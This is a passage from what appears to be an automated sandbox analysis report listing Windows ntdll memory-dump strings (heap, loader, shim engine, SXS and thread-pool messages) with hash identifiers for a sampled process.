                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 0-1745908468
                                                  Strings
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 04369A2A
                                                  • apphelp.dll, xrefs: 04306496
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 043699ED
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 04369A01
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 04369A11, 04369A3A
                                                  • LdrpInitShimEngine, xrefs: 043699F4, 04369A07, 04369A30
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-204845295
                                                  Strings
                                                  • SXS: %s() passed the empty activation context, xrefs: 04382165
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 043821BF
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 04382178
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0438219F
                                                  • RtlGetAssemblyStorageRoot, xrefs: 04382160, 0438219A, 043821BA
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 04382180
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  Strings
                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 043881E5
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 04388181, 043881F5
                                                  • LdrpInitializeProcess, xrefs: 0434C6C4
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0434C6C3
                                                  • Loading import redirection DLL: '%wZ', xrefs: 04388170
                                                  • LdrpInitializeImportRedirection, xrefs: 04388177, 043881EB
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-475462383
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 043802BD
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 043802E7
                                                  • RTL: Re-Waiting, xrefs: 0438031E
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  Strings
                                                  • Kernel-MUI-Language-Allowed, xrefs: 0433527B
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 04335352
                                                  • WindowsExcludedProcs, xrefs: 0433522A
                                                  • Kernel-MUI-Language-SKU, xrefs: 0433542B
                                                  • Kernel-MUI-Number-Allowed, xrefs: 04335247
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1975516107
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 2994545307-3570731704
                                                  Strings
                                                  • @, xrefs: 04348591
                                                  • LdrpInitializeProcess, xrefs: 04348422
                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0434855E
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 04348421
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 2994545307-1918872054
                                                  Strings
                                                  • SXS: %s() passed the empty activation context, xrefs: 043821DE
                                                  • .Local, xrefs: 043428D8
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 043821D9, 043822B1
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 043822B6
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  Strings
                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 04370FE5
                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 04371028
                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0437106B
                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 043710AE
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                  • API String ID: 0-1468400865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 2994545307-2586055223
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 2994545307-336120773
                                                  Strings
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0437A992
                                                  • LdrpDynamicShimModule, xrefs: 0437A998
                                                  • apphelp.dll, xrefs: 04332462
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0437A9A2
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-176724104
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 0-1391187441
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $ $0
                                                  • API String ID: 0-3352262554
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 04311728
                                                  • HEAP: , xrefs: 04311596
                                                  • HEAP[%wZ]: , xrefs: 04311712
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1145731471
                                                  • Opcode ID: dce9ca2dfb698935b0e70dfd7c8df53e786f29ba44afa9e3d7154362d5c2fa35
                                                  • Instruction ID: a644dfcc1ae0acadfddc727a5be65dc25bd73f263abb17451b42d767ba3ddbb0
                                                  • Opcode Fuzzy Hash: dce9ca2dfb698935b0e70dfd7c8df53e786f29ba44afa9e3d7154362d5c2fa35
                                                  • Instruction Fuzzy Hash: C4B1D031A14644AFDB29CF69C980BADF3B5BF44714F14A829E891EB790E338F844CB10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  • Opcode ID: 1271998065de04ce7ff34e91b532bbc02503ffd8bcdd21b11b8cc0c3d93c50a9
                                                  • Instruction ID: 32a80e0b2fe032ddd64dd9d8c669a81b01cd46f84ab4bb51793909596fbf6377
                                                  • Opcode Fuzzy Hash: 1271998065de04ce7ff34e91b532bbc02503ffd8bcdd21b11b8cc0c3d93c50a9
                                                  • Instruction Fuzzy Hash: 0BB18AB2604741AFEB21DE54C880F6BB7E8EF48724F016929FE419B290D774FC548B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                  • API String ID: 2994545307-2779062949
                                                  • Opcode ID: cf8f1f6e77e32f15c10ae9b05f72a6dae4b1f671a5522bcfd08a51eebf9ecd5c
                                                  • Instruction ID: a40df9e4ccb483d8230258d0477c73a3d24da3c2b30998a746a1b51bb6501c48
                                                  • Opcode Fuzzy Hash: cf8f1f6e77e32f15c10ae9b05f72a6dae4b1f671a5522bcfd08a51eebf9ecd5c
                                                  • Instruction Fuzzy Hash: 19A17B719016299BDB31DF64CC88BEEB7B8EF44704F1091E9E909A7250E735AE84CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                  • API String ID: 0-318774311
                                                  • Opcode ID: f3b714d729618ebf1e7c8153d9f753ee9ac5e10b45dde3dd510308dcfb44bfae
                                                  • Instruction ID: 885c9b0832e34788efd01cd99b31a408b72372507a1031e09b9ff4ecb642fb13
                                                  • Opcode Fuzzy Hash: f3b714d729618ebf1e7c8153d9f753ee9ac5e10b45dde3dd510308dcfb44bfae
                                                  • Instruction Fuzzy Hash: F7818871648340AFE721DF24C844F6AB7E8EF85754F04292DFD819B390E775E9148B62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                  • API String ID: 0-3870751728
                                                  • Opcode ID: ece8ad6db0d06d7ecc12b521d4b63738f62c4c34f44c7a0cebd6b2c33430cc71
                                                  • Instruction ID: afed602cb4b19678a62632218586688af2b5dc54775d0163a03fb3bcdb26efb7
                                                  • Opcode Fuzzy Hash: ece8ad6db0d06d7ecc12b521d4b63738f62c4c34f44c7a0cebd6b2c33430cc71
                                                  • Instruction Fuzzy Hash: AD914AB0E10605DFEB58DF68C480BADBBF1BF48304F24916AE905AB391E775A842CF54
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-373624363
                                                  • Opcode ID: 5478f60f4f981b32ec28e3ed78663bec6bd4843bb7e503757e5215029d8bf6c2
                                                  • Instruction ID: a537332878e44afe465c6a3e5a14b8d14b0a86e44ea753cca176bb7dd0367ccd
                                                  • Opcode Fuzzy Hash: 5478f60f4f981b32ec28e3ed78663bec6bd4843bb7e503757e5215029d8bf6c2
                                                  • Instruction Fuzzy Hash: CD91CF71E05659CFEB29CF58C440BAEB7B4EF14314F14A195EC52AB2A0D778B980DF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$&$@
                                                  • API String ID: 0-1537733988
                                                  • Opcode ID: 6e7049deef332ebd88fc01ca7966d0d6c41c67481dbf9e94d7ffc72909b812fb
                                                  • Instruction ID: 584347ed419ae888cadb2f928abe452961b40f87d880496d7884b5064431099d
                                                  • Opcode Fuzzy Hash: 6e7049deef332ebd88fc01ca7966d0d6c41c67481dbf9e94d7ffc72909b812fb
                                                  • Instruction Fuzzy Hash: 8D71AEB06097059FD714DF24C980BABBBE9BFC9718F10A91DE4A647690D730F905CB52
                                                  Strings
                                                  • GlobalizationUserSettings, xrefs: 043EB834
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 043EB82A
                                                  • TargetNtPath, xrefs: 043EB82F
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                   • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmp
                                                   • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: 92453194192f91625c36574a726f3d410036a67008c315c242eb6b75b64f3c4e
